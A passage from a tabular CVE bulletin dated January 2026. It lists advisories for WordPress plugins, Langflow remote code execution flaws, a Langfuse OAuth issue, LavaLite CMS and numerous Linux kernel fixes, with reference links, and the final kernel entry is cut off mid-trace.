| LambertGroup--Universal Video Player | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Universal Video Player universal-video-player allows Reflected XSS. This issue affects Universal Video Player: from n/a through <= 3.8.4. | 2026-01-22 | not yet calculated | CVE-2025-69048 | https://patchstack.com/database/Wordpress/Plugin/universal-video-player/vulnerability/wordpress-universal-video-player-plugin-3-8-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Universal Video Player | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Universal Video Player universal-video-player allows Reflected XSS. This issue affects Universal Video Player: from n/a through <= 3.8.4. | 2026-01-22 | not yet calculated | CVE-2025-69053 | https://patchstack.com/database/Wordpress/Plugin/universal-video-player/vulnerability/wordpress-universal-video-player-plugin-3-8-4-reflected-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| LambertGroup--xPromoter | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup xPromoter top_bar_promoter allows Reflected XSS. This issue affects xPromoter: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-49046 | https://patchstack.com/database/Wordpress/Plugin/top_bar_promoter/vulnerability/wordpress-xpromoter-plugin-1-3-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Langflow--Langflow | Langflow code Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the code parameter provided to the validate endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of root. . Was ZDI-CAN-27322. | 2026-01-23 | not yet calculated | CVE-2026-0768 | ZDI-26-034 |
| Langflow--Langflow | Langflow eval_custom_component_code Eval Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of eval_custom_component_code function. The issue results from the lack of proper validation of a user-supplied string before using it to execute python code. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-26972. | 2026-01-23 | not yet calculated | CVE-2026-0769 | ZDI-26-035 |
| Langflow--Langflow | Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325. | 2026-01-23 | not yet calculated | CVE-2026-0770 | ZDI-26-036 |
| Langflow--Langflow | Langflow PythonFunction Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Attack vectors and exploitability will vary depending on the configuration of the product. The specific flaw exists within the handling of Python function components. Depending upon product configuration, an attacker may be able to introduce custom Python code into a workflow. An attacker can leverage this vulnerability to execute code in the context of the application. Was ZDI-CAN-27497. | 2026-01-23 | not yet calculated | CVE-2026-0771 | ZDI-26-037 |
| Langflow--Langflow | Langflow Disk Cache Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is required to exploit this vulnerability. The specific flaw exists within the disk cache service. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27919. | 2026-01-23 | not yet calculated | CVE-2026-0772 | ZDI-26-038 |
| langfuse--langfuse | Langfuse is an open source large language model engineering platform. In versions 3.146.0 and below, the /api/public/slack/install endpoint initiates Slack OAuth using a projectId provided by the client without authentication or authorization. The projectId is preserved throughout the OAuth flow, and the callback stores installations based on this untrusted metadata. This allows an attacker to bind their Slack workspace to any project and potentially receive changes to prompts stored in Langfuse Prompt Management. An attacker can replace existing Prompt Slack Automation integrations or pre-register a malicious one, though the latter requires an authenticated user to unknowingly configure it despite visible workspace and channel indicators in the UI. This issue has been fixed in version 3.147.0. | 2026-01-22 | not yet calculated | CVE-2026-24055 | https://github.com/langfuse/langfuse/security/advisories/GHSA-pvq7-vvfj-p98x https://github.com/langfuse/langfuse/commit/3adc89e4d72729eabef55e46888b8ce80a7e3b0a https://github.com/langfuse/langfuse/releases/tag/v3.147.0 https://langfuse.com/docs/prompt-management/features/webhooks-slack-integrations |
| launchinteractive--Merge + Minify + Refresh | Cross-Site Request Forgery (CSRF) vulnerability in launchinteractive Merge + Minify + Refresh merge-minify-refresh allows Cross Site Request Forgery. This issue affects Merge + Minify + Refresh: from n/a through <= 2.14. | 2026-01-22 | not yet calculated | CVE-2026-24384 | https://patchstack.com/database/Wordpress/Plugin/merge-minify-refresh/vulnerability/wordpress-merge-minify-refresh-plugin-2-14-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| LavaLite--LavaLite CMS | LavaLite CMS versions up to and including 10.1.0 contain a stored cross-site scripting vulnerability in the package creation and search functionality. Authenticated users can supply crafted HTML or JavaScript in the package Name or Description fields that is stored and later rendered without proper output encoding in package search results. When other users view search results that include the malicious package, the injected script executes in their browsers, potentially enabling session hijacking, credential theft, and unauthorized actions in the context of the victim. | 2026-01-23 | not yet calculated | CVE-2025-71177 | https://github.com/LavaLite/cms/issues/420 https://lavalite.org/ https://www.vulncheck.com/advisories/lavalite-cms-stored-xss-via-package-creation-and-search |
| LazyCoders LLC--LazyTasks | Incorrect Privilege Assignment vulnerability in LazyCoders LLC LazyTasks lazytasks-project-task-management allows Privilege Escalation. This issue affects LazyTasks: from n/a through <= 1.4.01. | 2026-01-22 | not yet calculated | CVE-2025-68869 | https://patchstack.com/database/Wordpress/Plugin/lazytasks-project-task-management/vulnerability/wordpress-lazytasks-plugin-1-2-37-privilege-escalation-vulnerability?_s_id=cve |
| Leap13--Premium Addons for Elementor | Missing Authorization vulnerability in Leap13 Premium Addons for Elementor premium-addons-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Premium Addons for Elementor: from n/a through <= 4.11.63. | 2026-01-22 | not yet calculated | CVE-2025-69300 | https://patchstack.com/database/Wordpress/Plugin/premium-addons-for-elementor/vulnerability/wordpress-premium-addons-for-elementor-plugin-4-11-63-settings-change-vulnerability?_s_id=cve |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: phy: isp1301: fix non-OF device reference imbalance A recent change fixing a device reference leak in a UDC driver introduced a potential use-after-free in the non-OF case as the isp1301_get_client() helper only increases the reference count for the returned I2C device in the OF case. Increment the reference count also for non-OF so that the caller can decrement it unconditionally. Note that this is inherently racy just as using the returned I2C device is since nothing is preventing the PHY driver from being unbound while in use. | 2026-01-23 | not yet calculated | CVE-2025-71145 | https://git.kernel.org/stable/c/43e58abad6c08c5f0943594126ef4cd6559aac0b https://git.kernel.org/stable/c/03bbdaa4da8c6ea0c8431a5011db188a07822c8a https://git.kernel.org/stable/c/75c5d9bce072abbbc09b701a49869ac23c34a906 https://git.kernel.org/stable/c/5d3df03f70547d4e3fc10ed4381c052eff51b157 https://git.kernel.org/stable/c/7501ecfe3e5202490c2d13dc7e181203601fcd69 https://git.kernel.org/stable/c/b4b64fda4d30a83a7f00e92a0c8a1d47699609f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conncount: fix leaked ct in error paths There are some situations where ct might be leaked as error paths are skipping the refcounted check and return immediately. In order to solve it make sure that the check is always called. | 2026-01-23 | not yet calculated | CVE-2025-71146 | https://git.kernel.org/stable/c/08fa37f4c8c59c294e9c18fea2d083ee94074e5a https://git.kernel.org/stable/c/e1ac8dce3a893641bef224ad057932f142b8a36f https://git.kernel.org/stable/c/f381a33f34dda9e4023e38ba68c943bca83245e9 https://git.kernel.org/stable/c/325eb61bb30790ea27782203a17b007ce1754a67 https://git.kernel.org/stable/c/0b88be7211d21a0d68bb1e56dc805944e3654d6f https://git.kernel.org/stable/c/4bd2b89f4028f250dd1c1625eb3da1979b04a5e8 https://git.kernel.org/stable/c/2e2a720766886190a6d35c116794693aabd332b6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KEYS: trusted: Fix a memory leak in tpm2_load_cmd 'tpm2_load_cmd' allocates a tempoary blob indirectly via 'tpm2_key_decode' but it is not freed in the failure paths. Address this by wrapping the blob into with a cleanup helper. | 2026-01-23 | not yet calculated | CVE-2025-71147 | https://git.kernel.org/stable/c/3fd7df4636d8fd5e3592371967a5941204368936 https://git.kernel.org/stable/c/af0689cafb127a8d1af78cc8b72585c9b2a19ecd https://git.kernel.org/stable/c/19166de9737218b77122c41a5730ac87025e089f https://git.kernel.org/stable/c/9b015f2918b95bdde2ca9cefa10ef02b138aae1e https://git.kernel.org/stable/c/9e7c63c69f57b1db1a8a1542359a6167ff8fcef1 https://git.kernel.org/stable/c/62cd5d480b9762ce70d720a81fa5b373052ae05f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/handshake: restore destructor on submit failure handshake_req_submit() replaces sk->sk_destruct but never restores it when submission fails before the request is hashed. handshake_sk_destruct() then returns early and the original destructor never runs, leaking the socket. Restore sk_destruct on the error path. | 2026-01-23 | not yet calculated | CVE-2025-71148 | https://git.kernel.org/stable/c/cd8cf2be3717137554744233fda051ffc09d1d44 https://git.kernel.org/stable/c/7b82a1d6ae869533d8bdb0282a3a78faed8e63dd https://git.kernel.org/stable/c/b225325be7b247c7268e65eea6090db1fc786d1f https://git.kernel.org/stable/c/6af2a01d65f89e73c1cbb9267f8880d83a88cee4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/poll: correctly handle io_poll_add() return value on update When the core of io_uring was updated to handle completions consistently and with fixed return codes, the POLL_REMOVE opcode with updates got slightly broken. If a POLL_ADD is pending and then POLL_REMOVE is used to update the events of that request, if that update causes the POLL_ADD to now trigger, then that completion is lost and a CQE is never posted. Additionally, ensure that if an update does cause an existing POLL_ADD to complete, that the completion value isn't always overwritten with -ECANCELED. For that case, whatever io_poll_add() set the value to should just be retained. | 2026-01-23 | not yet calculated | CVE-2025-71149 | https://git.kernel.org/stable/c/8b777ab48441b153502772ecfc78c107d4353f29 https://git.kernel.org/stable/c/0126560370ed5217958b85657b590ad25e8b9c00 https://git.kernel.org/stable/c/c1669c03bfbc2a9b5ebff4428eecebe734c646fe https://git.kernel.org/stable/c/13a8f7b88c2d40c6b33f6216190478dda95d385f https://git.kernel.org/stable/c/84230ad2d2afbf0c44c32967e525c0ad92e26b4e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: Fix refcount leak when invalid session is found on session lookup When a session is found but its state is not SMB2_SESSION_VALID, It indicates that no valid session was found, but it is missing to decrement the reference count acquired by the session lookup, which results in a reference count leak. This patch fixes the issue by explicitly calling ksmbd_user_session_put to release the reference to the session. | 2026-01-23 | not yet calculated | CVE-2025-71150 | https://git.kernel.org/stable/c/0fb87b28cafae71e9c8248432cc3a6a1fd759efc https://git.kernel.org/stable/c/e54fb2a4772545701766cba08aab20de5eace8cd https://git.kernel.org/stable/c/02e06785e85b4bd86ef3d23b7c8d87acc76773d5 https://git.kernel.org/stable/c/8cabcb4dd3dc85dd83a37d26efcc59a66a4074d7 https://git.kernel.org/stable/c/cafb57f7bdd57abba87725eb4e82bbdca4959644 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix memory and information leak in smb3_reconfigure() In smb3_reconfigure(), if smb3_sync_session_ctx_passwords() fails, the function returns immediately without freeing and erasing the newly allocated new_password and new_password2. This causes both a memory leak and a potential information leak. Fix this by calling kfree_sensitive() on both password buffers before returning in this error case. | 2026-01-23 | not yet calculated | CVE-2025-71151 | https://git.kernel.org/stable/c/bc390b2737205163e48cc1655f6a0c8cd55b02fc https://git.kernel.org/stable/c/5679cc90bb5415801fa29041da0319d9e15d295d https://git.kernel.org/stable/c/bb82aaee16907dc4d0b9b0ca7953ceb3edc328c6 https://git.kernel.org/stable/c/cb6d5aa9c0f10074f1ad056c3e2278ad2cc7ec8d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: properly keep track of conduit reference Problem description ------------------- DSA has a mumbo-jumbo of reference handling of the conduit net device and its kobject which, sadly, is just wrong and doesn't make sense. There are two distinct problems. 1. The OF path, which uses of_find_net_device_by_node(), never releases the elevated refcount on the conduit's kobject. Nominally, the OF and non-OF paths should result in objects having identical reference counts taken, and it is already suspicious that dsa_dev_to_net_device() has a put_device() call which is missing in dsa_port_parse_of(), but we can actually even verify that an issue exists. With CONFIG_DEBUG_KOBJECT_RELEASE=y, if we run this command "before" and "after" applying this patch: (unbind the conduit driver for net device eno2) echo 0000:00:00.2 > /sys/bus/pci/drivers/fsl_enetc/unbind we see these lines in the output diff which appear only with the patch applied: kobject: 'eno2' (ffff002009a3a6b8): kobject_release, parent 0000000000000000 (delayed 1000) kobject: '109' (ffff0020099d59a0): kobject_release, parent 0000000000000000 (delayed 1000) 2. After we find the conduit interface one way (OF) or another (non-OF), it can get unregistered at any time, and DSA remains with a long-lived, but in this case stale, cpu_dp->conduit pointer. Holding the net device's underlying kobject isn't actually of much help, it just prevents it from being freed (but we never need that kobject directly). What helps us to prevent the net device from being unregistered is the parallel netdev reference mechanism (dev_hold() and dev_put()). Actually we actually use that netdev tracker mechanism implicitly on user ports since commit 2f1e8ea726e9 ("net: dsa: link interfaces with the DSA master to get rid of lockdep warnings"), via netdev_upper_dev_link(). But time still passes at DSA switch probe time between the initial of_find_net_device_by_node() code and the user port creation time, time during which the conduit could unregister itself and DSA wouldn't know about it. So we have to run of_find_net_device_by_node() under rtnl_lock() to prevent that from happening, and release the lock only with the netdev tracker having acquired the reference. Do we need to keep the reference until dsa_unregister_switch() / dsa_switch_shutdown()? 1: Maybe yes. A switch device will still be registered even if all user ports failed to probe, see commit 86f8b1c01a0a ("net: dsa: Do not make user port errors fatal"), and the cpu_dp->conduit pointers remain valid. I haven't audited all call paths to see whether they will actually use the conduit in lack of any user port, but if they do, it seems safer to not rely on user ports for that reference. 2. Definitely yes. We support changing the conduit which a user port is associated to, and we can get into a situation where we've moved all user ports away from a conduit, thus no longer hold any reference to it via the net device tracker. But we shouldn't let it go nonetheless - see the next change in relation to dsa_tree_find_first_conduit() and LAG conduits which disappear. We have to be prepared to return to the physical conduit, so the CPU port must explicitly keep another reference to it. This is also to say: the user ports and their CPU ports may not always keep a reference to the same conduit net device, and both are needed. As for the conduit's kobject for the /sys/class/net/ entry, we don't care about it, we can release it as soon as we hold the net device object itself. History and blame attribution ----------------------------- The code has been refactored so many times, it is very difficult to follow and properly attribute a blame, but I'll try to make a short history which I hope to be correct. We have two distinct probing paths: - one for OF, introduced in 2016 i ---truncated--- | 2026-01-23 | not yet calculated | CVE-2025-71152 | https://git.kernel.org/stable/c/0e766b77ba5093583dfe609fae0aa1545c46dbbd https://git.kernel.org/stable/c/06e219f6a706c367c93051f408ac61417643d2f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: Fix memory leak in get_file_all_info() In get_file_all_info(), if vfs_getattr() fails, the function returns immediately without freeing the allocated filename, leading to a memory leak. Fix this by freeing the filename before returning in this error case. | 2026-01-23 | not yet calculated | CVE-2025-71153 | https://git.kernel.org/stable/c/5012b4c812230ae066902a00442708c999111183 https://git.kernel.org/stable/c/676907004256e0226c7ed3691db9f431404ca258 https://git.kernel.org/stable/c/d026f47db68638521df8543535ef863814fb01b1 https://git.kernel.org/stable/c/0c56693b06a68476ba113db6347e7897475f9e4c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: rtl8150: fix memory leak on usb_submit_urb() failure In async_set_registers(), when usb_submit_urb() fails, the allocated async_req structure and URB are not freed, causing a memory leak. The completion callback async_set_reg_cb() is responsible for freeing these allocations, but it is only called after the URB is successfully submitted and completes (successfully or with error). If submission fails, the callback never runs and the memory is leaked. Fix this by freeing both the URB and the request structure in the error path when usb_submit_urb() fails. | 2026-01-23 | not yet calculated | CVE-2025-71154 | https://git.kernel.org/stable/c/a4e2442d3c48355a84463342f397134f149936d7 https://git.kernel.org/stable/c/2f966186b99550e3c665dbfb87b8314e30acea02 https://git.kernel.org/stable/c/db2244c580540306d60ce783ed340190720cd429 https://git.kernel.org/stable/c/4bd4ea3eb326608ffc296db12c105f92dc2f2190 https://git.kernel.org/stable/c/6492ad6439ff1a479fc94dc6052df3628faed8b6 https://git.kernel.org/stable/c/151403e903840c9cf06754097b6732c14f26c532 https://git.kernel.org/stable/c/12cab1191d9890097171156d06bfa8d31f1e39c8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: s390: Fix gmap_helper_zap_one_page() again A few checks were missing in gmap_helper_zap_one_page(), which can lead to memory corruption in the guest under specific circumstances. Add the missing checks. | 2026-01-23 | not yet calculated | CVE-2025-71155 | https://git.kernel.org/stable/c/2af2abbcbf8573100288e8f8aea2dab8a2a0ceb7 https://git.kernel.org/stable/c/2f393c228cc519ddf19b8c6c05bf15723241aa96 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gve: defer interrupt enabling until NAPI registration Currently, interrupts are automatically enabled immediately upon request. This allows interrupt to fire before the associated NAPI context is fully initialized and cause failures like below: [ 0.946369] Call Trace: [ 0.946369] <IRQ> [ 0.946369] __napi_poll+0x2a/0x1e0 [ 0.946369] net_rx_action+0x2f9/0x3f0 [ 0.946369] handle_softirqs+0xd6/0x2c0 [ 0.946369] ? handle_edge_irq+0xc1/0x1b0 [ 0.946369] __irq_exit_rcu+0xc3/0xe0 [ 0.946369] common_interrupt+0x81/0xa0 [ 0.946369] </IRQ> [ 0.946369] <TASK> [ 0.946369] asm_common_interrupt+0x22/0x40 [ 0.946369] RIP: 0010:pv_native_safe_halt+0xb/0x10 Use the `IRQF_NO_AUTOEN` flag when requesting interrupts to prevent auto enablement and explicitly enable the interrupt in NAPI initialization path (and disable it during NAPI teardown). This ensures that interrupt lifecycle is strictly coupled with readiness of NAPI context. | 2026-01-23 | not yet calculated | CVE-2025-71156 | https://git.kernel.org/stable/c/f5b7f49bd2377916ad57cbd1210c61196daff013 https://git.kernel.org/stable/c/48f9277680925e1a8623d6b2c50aadb7af824ace https://git.kernel.org/stable/c/3d970eda003441f66551a91fda16478ac0711617 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() Since nldev_deldev() (introduced by commit 060c642b2ab8 ("RDMA/nldev: Add support to add/delete a sub IB device through netlink") grabs a reference using ib_device_get_by_index() before calling ib_del_sub_device_and_put(), we need to drop that reference before returning -EOPNOTSUPP error. | 2026-01-23 | not yet calculated | CVE-2025-71157 | https://git.kernel.org/stable/c/20436f2742a92b7afeb2504eb559a98d2196b001 https://git.kernel.org/stable/c/fe8d456080423b9ed410469fbd1e2098d3acce2b https://git.kernel.org/stable/c/fa3c411d21ebc26ffd175c7256c37cefa35020aa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpio: mpsse: ensure worker is torn down When an IRQ worker is running, unplugging the device would cause a crash. The sealevel hardware this driver was written for was not hotpluggable, so I never realized it. This change uses a spinlock to protect a list of workers, which it tears down on disconnect. | 2026-01-23 | not yet calculated | CVE-2025-71158 | https://git.kernel.org/stable/c/472d900c8bcac301ae0e40fdca7db799bd989ff5 https://git.kernel.org/stable/c/179ef1127d7a4f09f0e741fa9f30b8a8e7886271 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix use-after-free warning in btrfs_get_or_create_delayed_node() Previously, btrfs_get_or_create_delayed_node() set the delayed_node's refcount before acquiring the root->delayed_nodes lock. Commit e8513c012de7 ("btrfs: implement ref_tracker for delayed_nodes") moved refcount_set inside the critical section, which means there is no longer a memory barrier between setting the refcount and setting btrfs_inode->delayed_node. Without that barrier, the stores to node->refs and btrfs_inode->delayed_node may become visible out of order. Another thread can then read btrfs_inode->delayed_node and attempt to increment a refcount that hasn't been set yet, leading to a refcounting bug and a use-after-free warning. The fix is to move refcount_set back to where it was to take advantage of the implicit memory barrier provided by lock acquisition. Because the allocations now happen outside of the lock's critical section, they can use GFP_NOFS instead of GFP_ATOMIC. | 2026-01-23 | not yet calculated | CVE-2025-71159 | https://git.kernel.org/stable/c/c8385851a5435f4006281828d428e5d0b0bbf8af https://git.kernel.org/stable/c/83f59076a1ae6f5c6845d6f7ed3a1a373d883684 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: avoid chain re-validation if possible Hamza Mahfooz reports cpu soft lock-ups in nft_chain_validate(): watchdog: BUG: soft lockup - CPU#1 stuck for 27s! [iptables-nft-re:37547] [..] RIP: 0010:nft_chain_validate+0xcb/0x110 [nf_tables] [..] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_table_validate+0x6b/0xb0 [nf_tables] nf_tables_validate+0x8b/0xa0 [nf_tables] nf_tables_commit+0x1df/0x1eb0 [nf_tables] [..] Currently nf_tables will traverse the entire table (chain graph), starting from the entry points (base chains), exploring all possible paths (chain jumps). But there are cases where we could avoid revalidation. Consider: 1 input -> j2 -> j3 2 input -> j2 -> j3 3 input -> j1 -> j2 -> j3 Then the second rule does not need to revalidate j2, and, by extension j3, because this was already checked during validation of the first rule. We need to validate it only for rule 3. This is needed because chain loop detection also ensures we do not exceed the jump stack: Just because we know that j2 is cycle free, its last jump might now exceed the allowed stack size. We also need to update all reachable chains with the new largest observed call depth. Care has to be taken to revalidate even if the chain depth won't be an issue: chain validation also ensures that expressions are not called from invalid base chains. For example, the masquerade expression can only be called from NAT postrouting base chains. Therefore we also need to keep record of the base chain context (type, hooknum) and revalidate if the chain becomes reachable from a different hook location. | 2026-01-23 | not yet calculated | CVE-2025-71160 | https://git.kernel.org/stable/c/53de1e6cde8f9b791d9cf61aa0e7b02cf5bbe8b1 https://git.kernel.org/stable/c/14fa3d1927f1382f86e3f70a51f26005c8e3cff6 https://git.kernel.org/stable/c/09d6074995c186e449979fe6c1b0f1a69cf9bd3b https://git.kernel.org/stable/c/8e1a1bc4f5a42747c08130b8242ebebd1210b32f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm-verity: disable recursive forward error correction There are two problems with the recursive correction: 1. It may cause denial-of-service. In fec_read_bufs, there is a loop that has 253 iterations. For each iteration, we may call verity_hash_for_block recursively. There is a limit of 4 nested recursions - that means that there may be at most 253^4 (4 billion) iterations. Red Hat QE team actually created an image that pushes dm-verity to this limit - and this image just makes the udev-worker process get stuck in the 'D' state. 2. It doesn't work. In fec_read_bufs we store data into the variable "fio->bufs", but fio bufs is shared between recursive invocations, if "verity_hash_for_block" invoked correction recursively, it would overwrite partially filled fio->bufs. | 2026-01-23 | not yet calculated | CVE-2025-71161 | https://git.kernel.org/stable/c/232948cf600fba69aff36b25d85ef91a73a35756 https://git.kernel.org/stable/c/d9f3e47d3fae0c101d9094bc956ed24e7a0ee801 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: tegra-adma: Fix use-after-free A use-after-free bug exists in the Tegra ADMA driver when audio streams are terminated, particularly during XRUN conditions. The issue occurs when the DMA buffer is freed by tegra_adma_terminate_all() before the vchan completion tasklet finishes accessing it. The race condition follows this sequence: 1. DMA transfer completes, triggering an interrupt that schedules the completion tasklet (tasklet has not executed yet) 2. Audio playback stops, calling tegra_adma_terminate_all() which frees the DMA buffer memory via kfree() 3. The scheduled tasklet finally executes, calling vchan_complete() which attempts to access the already-freed memory Since tasklets can execute at any time after being scheduled, there is no guarantee that the buffer will remain valid when vchan_complete() runs. Fix this by properly synchronizing the virtual channel completion: - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the descriptors as terminated instead of freeing the descriptor. - Add the callback tegra_adma_synchronize() that calls vchan_synchronize() which kills any pending tasklets and frees any terminated descriptors. Crash logs: [ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0 [ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0 [ 337.427562] Call trace: [ 337.427564] dump_backtrace+0x0/0x320 [ 337.427571] show_stack+0x20/0x30 [ 337.427575] dump_stack_lvl+0x68/0x84 [ 337.427584] print_address_description.constprop.0+0x74/0x2b8 [ 337.427590] kasan_report+0x1f4/0x210 [ 337.427598] __asan_load8+0xa0/0xd0 [ 337.427603] vchan_complete+0x124/0x3b0 [ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0 [ 337.427617] tasklet_action+0x30/0x40 [ 337.427623] __do_softirq+0x1a0/0x5c4 [ 337.427628] irq_exit+0x110/0x140 [ 337.427633] handle_domain_irq+0xa4/0xe0 [ 337.427640] gic_handle_irq+0x64/0x160 [ 337.427644] call_on_irq_stack+0x20/0x4c [ 337.427649] do_interrupt_handler+0x7c/0x90 [ 337.427654] el1_interrupt+0x30/0x80 [ 337.427659] el1h_64_irq_handler+0x18/0x30 [ 337.427663] el1h_64_irq+0x7c/0x80 [ 337.427667] cpuidle_enter_state+0xe4/0x540 [ 337.427674] cpuidle_enter+0x54/0x80 [ 337.427679] do_idle+0x2e0/0x380 [ 337.427685] cpu_startup_entry+0x2c/0x70 [ 337.427690] rest_init+0x114/0x130 [ 337.427695] arch_call_rest_init+0x18/0x24 [ 337.427702] start_kernel+0x380/0x3b4 [ 337.427706] __primary_switched+0xc0/0xc8 | 2026-01-25 | not yet calculated | CVE-2025-71162 | https://git.kernel.org/stable/c/cb2c9c4bb1322cc3c9984ad17db8cdd2663879ca https://git.kernel.org/stable/c/be655c3736b3546f39bc8116ffbf2a3b6cac96c4 https://git.kernel.org/stable/c/2efd07a7c36949e6fa36a69183df24d368bf9e96 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: idxd: fix device leaks on compat bind and unbind Make sure to drop the reference taken when looking up the idxd device as part of the compat bind and unbind sysfs interface. | 2026-01-25 | not yet calculated | CVE-2025-71163 | https://git.kernel.org/stable/c/0c97ff108f825a70c3bb29d65ddf0a013d231bb9 https://git.kernel.org/stable/c/a7226fd61def74b60dd8e47ec84cabafc39d575b https://git.kernel.org/stable/c/799900f01792cf8b525a44764f065f83fcafd468 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset `qfq_class->leaf_qdisc->q.qlen > 0` does not imply that the class itself is active. Two qfq_class objects may point to the same leaf_qdisc. This happens when: 1. one QFQ qdisc is attached to the dev as the root qdisc, and 2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get() / qdisc_put()) and is pending to be destroyed, as in function tc_new_tfilter. When packets are enqueued through the root QFQ qdisc, the shared leaf_qdisc->q.qlen increases. At the same time, the second QFQ qdisc triggers qdisc_put and qdisc_destroy: the qdisc enters qfq_reset() with its own q->q.qlen == 0, but its class's leaf qdisc->q.qlen > 0. Therefore, the qfq_reset would wrongly deactivate an inactive aggregate and trigger a null-deref in qfq_deactivate_agg: [ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000 [ 0.903571] #PF: supervisor write access in kernel mode [ 0.903860] #PF: error_code(0x0002) - not-present page [ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0 [ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI [ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE [ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 [ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2)) [ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0 Code starting with the faulting instruction =========================================== 0: 0f 84 4d 01 00 00 je 0x153 6: 48 89 70 18 mov %rsi,0x18(%rax) a: 8b 4b 10 mov 0x10(%rbx),%ecx d: 48 c7 c2 ff ff ff ff mov $0xffffffffffffffff,%rdx 14: 48 8b 78 08 mov 0x8(%rax),%rdi 18: 48 d3 e2 shl %cl,%rdx 1b: 48 21 f2 and %rsi,%rdx 1e: 48 2b 13 sub (%rbx),%rdx 21: 48 8b 30 mov (%rax),%rsi 24: 48 d3 ea shr %cl,%rdx 27: 8b 4b 18 mov 0x18(%rbx),%ecx ... [ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246 [ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000 [ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 [ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000 [ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000 [ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: 